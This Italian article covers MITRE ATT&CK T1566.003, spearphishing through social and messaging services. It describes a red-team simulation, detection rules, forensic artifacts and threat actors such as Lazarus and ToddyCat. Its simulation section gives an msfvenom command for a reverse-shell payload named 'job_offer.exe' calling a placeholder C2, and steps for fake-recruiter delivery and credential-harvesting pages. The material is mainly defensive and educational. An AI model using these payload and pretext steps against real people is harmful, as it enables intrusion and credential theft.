Phishing via Servizi Terzi: Spearphishing via Service (T1566.003)

La simulazione di questa tecnica in ambiente controllato richiede la costruzione di un'infrastruttura social engineering credibile e la verifica della capacità dell'organizzazione di intercettare payload consegnati attraverso canali non convenzionali. Il fulcro dell'esercizio non è il payload in sé — che può essere un semplice callback beacon — ma il vettore di consegna: messaggio diretto su piattaforma social, allegato via webmail personale, archivio inviato tramite app di messaggistica.

Preparazione del profilo e del pretesto. Crea un account LinkedIn o un profilo di messaggistica dedicato all'engagement. L'approccio più replicato in campagne reali è l'offerta lavorativa fittizia: un recruiter di una società di consulenza che propone una posizione attraente è un pretesto che giustifica domande su tecnologie interne, software in uso e organigrammi.

Generazione del payload. Per il callback iniziale, GoPhish (open source) consente di orchestrare campagne di phishing con tracking granulare e funziona perfettamente anche per simulare link malevoli distribuiti via servizi esterni. In alternativa, per un test di esecuzione, un payload generato con msfvenom di Metasploit Framework (open source) offre flessibilità:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP_C2> LPORT=443 -f exe -o job_offer.exe

Comprimi il binario in un archivio ZIP protetto da password, esattamente come documentato per ToddyCat, che ha distribuito il loader di Ninja in archivi ZIP via Telegram.

Consegna via canale terzo. Invia il pacchetto attraverso il canale concordato con il cliente — messaggio diretto LinkedIn, allegato WhatsApp, condivisione Dropbox con notifica e-mail. Quest'ultimo scenario replica il comportamento di EXOTIC LILY, che sfruttava le notifiche native di servizi di file sharing legittimi per aggirare i filtri di posta.

Verifica della detection. Dopo l'apertura del payload, controlla se il SOC rileva la catena di esecuzione anomala: il browser o il client di messaggistica che scrive un file in una directory di download, seguito dall'avvio di un processo figlio inatteso. Su Windows, Sysmon (open source) con una configurazione adeguata registra questa genealogia in modo dettagliato.

Per la componente social engineering pura — senza esecuzione di codice — lo strumento Social Engineering Toolkit, SET (open source), offre moduli per la clonazione di pagine di login e la generazione di link di credential harvesting, utili a testare la reattività degli utenti di fronte a messaggi ricevuti fuori dal perimetro aziendale.

La sfida principale di questa tecnica per un analista SOC è che l'interazione iniziale avviene fuori dal perimetro di visibilità aziendale: un messaggio su LinkedIn o WhatsApp non transita per il mail gateway. La detection, quindi, deve concentrarsi sul momento in cui l'attività torna nel perimetro — il download del file, l'esecuzione del payload, la connessione C2.

Log source critici. Su Windows, la combinazione di WinEventLog:Security e WinEventLog:Sysmon è la base imprescindibile. Su Linux, auditd:SYSCALL e linux:syslog accoppiati ai flussi di rete (NSM:Flow) forniscono una visibilità equivalente. Su macOS, il Unified Log cattura l'intera catena da download a esecuzione.

Regola comportamentale cardine. L'indicatore più affidabile è la genealogia anomala dei processi: un browser — Chrome, Firefox, Edge — o un client di posta che genera un processo figlio sospetto. Su Sysmon, EventCode 1 (Process Create) espone la relazione parent-child. Una regola che rilevi chrome.exe → powershell.exe, oppure firefox → bash, ha un rapporto segnale/rumore elevato. L'analoga catena su macOS vede Safari o Mail.app seguiti da osascript o Terminal.

Il tuning richiede attenzione su tre parametri:

• MonitoredServices: definisci la lista di servizi terzi rilevanti per il profilo di rischio dell'organizzazione (Gmail, LinkedIn, Dropbox, Telegram).
• SuspiciousProcessPatterns: mappa le relazioni parent-child considerate anomale, escludendo quelle legittime (ad esempio, un browser che avvia un handler PDF configurato).
• TimeWindow: correla la creazione di un file nella directory di download con connessioni outbound entro una finestra temporale configurabile — tipicamente 60-120 secondi.

Controlli preventivi. La mitigazione Restrict Web-Based Content (M1021) si traduce operativamente nel blocco — o almeno nel monitoraggio intensivo — delle piattaforme social e webmail personali attraverso il web proxy. Se il blocco totale non è praticabile, abilita l'ispezione TLS e il logging categorizzato: sapere che un utente ha scaricato un file da una webmail personale è già un'informazione utile per la correlazione. L'Audit (M1047) delle interazioni con piattaforme di messaggistica e collaborazione esterne completa la postura: log di accesso, file scambiati e connessioni anomale post-download.

Per i falsi positivi, il contesto è tutto: un download da Dropbox seguito da apertura in Word è normale; lo stesso download seguito da powershell.exe con argomento encoded non lo è. Il discriminante è sempre il processo figlio.

L'analisi forense di un incidente originato da spearphishing via service presenta una peculiarità strutturale: la prima parte della kill chain — il contatto iniziale, la costruzione del rapporto, l'invio del messaggio — risiede su piattaforme esterne e non lascia artefatti sull'endpoint fino al momento del download. La timeline, quindi, si costruisce a partire dall'atterraggio del file sul disco.

Artefatti Windows. Il punto di partenza è la directory di download del browser. La zona identifier, registrata nell'Alternate Data Stream Zone.Identifier (stream :Zone.TransferInfo), contiene il ReferrerUrl e l'HostUrl da cui il file è stato scaricato: se puntano a domini di webmail personale, servizi di file sharing o CDN di social network, si ha un primo indicatore del vettore. La cronologia del browser — file History di Chrome in formato SQLite, ad esempio — permette di risalire alla sessione di navigazione che ha preceduto il download.

Per la catena di esecuzione, i log Sysmon sono fondamentali. EventCode 1 documenta la creazione del processo con riga di comando completa e hash del binario. EventCode 11 (File Create) registra il momento esatto in cui il file è stato scritto su disco. EventCode 3 (Network Connection) correla il processo con le connessioni outbound successive, tipicamente verso il C2.

Le chiavi di registro UserAssist e i file Prefetch forniscono conferma indipendente dell'esecuzione e della frequenza d'uso del payload. Se l'utente ha aperto un archivio ZIP — come nel caso degli archivi contenenti il malware Ninja distribuiti via Telegram da ToddyCat — la cache di estrazione temporanea dell'archiver (7-Zip, WinRAR) può contenere tracce del contenuto originale.

Artefatti Linux e macOS. Su Linux, i log auditd con regole sulla syscall execve catturano l'avvio di processi post-download. La directory ~/.local/share/Trash e i metadati xattr possono conservare informazioni sull'origine del file. Su macOS, gli eventi FSEvents registrano la creazione nella cartella Downloads, mentre il Launch Services Database (LSQuarantine) traccia i file scaricati, inclusa la sorgente.

Ricostruzione della timeline. La sequenza tipo da documentare è: accesso alla piattaforma esterna tramite browser → download del file → eventuale estrazione da archivio → esecuzione → connessione C2. Ogni passaggio ha un artefatto dedicato. La correlazione temporale tra la sessione browser e la prima connessione di rete anomala definisce la finestra di compromissione iniziale, dato essenziale per il contenimento.

Lo spearphishing via service attira un ventaglio di attori eterogeneo per motivazione, area geografica e sofisticazione operativa. Analizzare i pattern d'uso rivela raggruppamenti significativi.

Il cluster nordcoreano e il pretesto lavorativo. Lazarus Group è il riferimento principale: la campagna Operation Dream Job (C0022, attiva tra settembre 2019 e agosto 2020) ha preso di mira i settori difesa, aerospaziale e governativo in Stati Uniti, Israele, Australia, Russia e India, utilizzando LinkedIn come canale esclusivo per proporre opportunità lavorative fittizie. In almeno un caso, l'accesso ottenuto è stato monetizzato con un tentativo di Business Email Compromise. Lo stesso schema è adottato da FIN6, che ha inviato finti annunci di lavoro via LinkedIn, e da Contagious Interview, che ha combinato falsi annunci su piattaforme di recruiting con messaggi diretti sui social media. Moonstone Sleet ha sfruttato servizi social per consegnare software trojanizzato. Il pretesto lavorativo su LinkedIn è dunque un pattern consolidato, replicabile e da monitorare con priorità.

Gli attori iraniani e la diversificazione dei canali. Tre gruppi legati all'Iran mostrano un uso sistematico dei social media per l'ingaggio iniziale. Magic Hound ha operato su LinkedIn e WhatsApp. Ajax Security Team ha sfruttato diversi canali social. CURIUM ha utilizzato piattaforme social per consegnare file malevoli. Il pattern iraniano si distingue per la pazienza nell'engagement: la costruzione del rapporto precede di settimane o mesi l'invio del payload.

Attori con canali specifici. Alcuni gruppi si caratterizzano per la scelta di piattaforme particolari. Dark Caracal ha operato su Facebook e WhatsApp, privilegiando il mobile come superficie d'attacco. ToddyCat ha utilizzato Telegram per distribuire archivi ZIP contenenti loader del malware Ninja, un canale inusuale che sfrutta la crittografia end-to-end della piattaforma per eludere l'intercettazione in transito. Storm-1811 ha adottato un approccio distintivo impersonando personale IT aziendale su Microsoft Teams, con messaggi e chiamate vocali — una variante che sposta il pretesto dal social engineering esterno alla simulazione di supporto tecnico interno.

EXOTIC LILY merita una menzione per l'eleganza del vettore: anziché inviare direttamente allegati, ha sfruttato le notifiche e-mail native di servizi di file sharing legittimi, facendo arrivare il messaggio di phishing attraverso un mittente fidato — la piattaforma stessa.

Windshift completa il panorama con l'uso di false identità sui social media per ingaggiare e profilare le vittime prima dell'attacco.

Il trend emergente è chiaro: la superficie di phishing si sposta progressivamente dai canali e-mail tradizionali verso le piattaforme collaborative e di messaggistica, dove i controlli di sicurezza aziendali hanno visibilità limitata.

Framework MITRE ATT&CK v16 — T1566.003 (Spearphishing via Service), TA0001 (Initial Access). Campagna C0022 (Operation Dream Job). Detection: Sysmon, auditd, macOS Unified Log. Mitigazioni: M1017, M1018, M1021, M1047, M1049. Tool: GoPhish, Metasploit Framework, SET, Sysmon. Integrato con conoscenza professionale per tool e procedure operative.